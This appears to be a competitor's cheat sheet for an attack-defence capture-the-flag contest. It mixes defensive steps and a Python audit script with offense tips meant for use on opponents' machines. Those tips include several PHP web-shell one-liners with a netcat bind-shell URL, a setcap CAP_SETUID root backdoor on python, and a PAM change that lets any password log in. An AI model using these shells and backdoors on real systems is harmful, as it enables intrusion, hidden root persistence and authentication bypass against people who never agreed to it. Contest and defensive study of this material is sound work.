Team of 4 or 5
One Linux Box
One Windows Box
If there are root/admin passwords, change them immediately. Change any other passwords on the box as well, as long as they aren’t used by the scoring bot/service.
Defending 2-3 services on each box. I don’t remember all the services but there was FTP and a wikipedia (TikiWiki). I think there was another web service as well.
FTP. Your boxes are the same as everyone else’s. Get login details so you can remote into your opponents’ boxes.
Key Point: Any login that works on your box, works on other peoples box. If you have a login to the TikiWiki admin, you have a login to THEIR TikiWiki.
WEB STUFF:
web shell:
<?php echo exec($_GET["password"]);?>
<?php echo shell_exec($_GET["password"]);?>
<?php system($_GET["password"],$retval);?>
<?php passthru($_GET["password"]);?>
Use it like this:
http://target_ip/filename_with_this_phpline.php?password=nc -l -p 59741 -e /bin/sh
DEFENSE:
Change permissions on the flag files so they are read-only (nobody can write to them).
Make your flag files immutable (unable to be changed)
chattr +i /path/to/flag/file
OFFENSE:
If you get on another person’s box, here’s some sneaky tips (they require root):
setcap CAP_SETUID=ep `which python`
^ after doing this, you can get a root shell at any time: python -c "import os;os.setuid(0);os.seteuid(0);os.system('/bin/bash')"
This gives the binary the CAP_SETUID file capability, so it can switch to uid 0 like a setuid-root program without the suid bit ever being set 😀 (it won’t show up in a find for suid files; only the file capabilities reveal it).
———————————
Look for lines like these in /etc/pam.d/common-auth:
auth [success=1 default=ignore] pam_unix.so nullok_secure
auth requisite pam_deny.so
Change it to this:
auth [success=1 default=1] pam_unix.so nullok_secure
This allows any username/password combination to work: when pam_unix fails, default=1 jumps over the pam_deny line that would normally reject the login, so you basically nullify password checking and all logins are allowed.
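Added example (not part of the original notes): a small Python audit for the defending side that checks saved output of `cat /etc/pam.d/common-auth`, `getcap -r /` and `lsattr` for the two root tricks above (the default=N jump in PAM and a cap_setuid binary) and for flag files that are missing the immutable bit. All sample inputs and paths below are constructed, not taken from a real box.

```python
import re

# Constructed samples (not captured from a real box) so the checks run offline.
SAMPLE_COMMON_AUTH = """\
# constructed /etc/pam.d/common-auth with the default=1 change from above
auth [success=1 default=1] pam_unix.so nullok_secure
auth requisite pam_deny.so
auth required pam_permit.so
"""
SAMPLE_GETCAP = """\
/usr/bin/python3.8 cap_setuid=ep
/usr/bin/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""
SAMPLE_LSATTR = """\
----i---------e------- /opt/flags/flag1.txt
--------------e------- /opt/flags/flag2.txt
"""

def pam_auth_issues(common_auth_text):
    """default=N on the pam_unix line is a jump: on a wrong password PAM skips the
    next N lines, i.e. the pam_deny that should fail the login. No pam_deny is flagged too."""
    issues, saw_deny = [], False
    for line in common_auth_text.splitlines():
        fields = line.split()
        if not fields or fields[0] != "auth":
            continue
        saw_deny = saw_deny or "pam_deny.so" in fields
        m = re.match(r"auth\s+\[([^\]]*)\]\s+pam_unix\.so", line.strip())
        if m:
            ctl = dict(kv.split("=", 1) for kv in m.group(1).split() if "=" in kv)
            if ctl.get("default", "").isdigit():
                issues.append("pam_unix skips %s line(s) on failure: %s" % (ctl["default"], line.strip()))
    if not saw_deny:
        issues.append("no pam_deny.so in the auth stack")
    return issues

def setuid_capable_binaries(getcap_output):
    """Paths from `getcap -r /` output that carry cap_setuid ('path = caps' or newer 'path caps' form)."""
    rows = [re.split(r"\s+=?\s*", l.strip(), maxsplit=1) for l in getcap_output.splitlines()]
    return [path for path, caps in (r for r in rows if len(r) == 2) if "cap_setuid" in caps.lower()]

def mutable_flags(lsattr_output):
    """Paths from `lsattr` output whose attribute string lacks 'i' (immutable)."""
    rows = [l.split(None, 1) for l in lsattr_output.splitlines()]
    return [path for attrs, path in (r for r in rows if len(r) == 2) if "i" not in attrs]

if __name__ == "__main__":
    print(pam_auth_issues(SAMPLE_COMMON_AUTH))
    print(setuid_capable_binaries(SAMPLE_GETCAP), mutable_flags(SAMPLE_LSATTR))
```

Run it against the real command output on the box once at the start and again every few minutes; any new hit is a sign someone else got root.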
———————————
MYSQL (if it’s there):
mysql -p (connects as the current user, you provide a password. Try without -p for passwordless login)
show databases; (shows databases)
connect DB_NAME;
show tables;
select * from TABLE_NAME;
(this should get you started)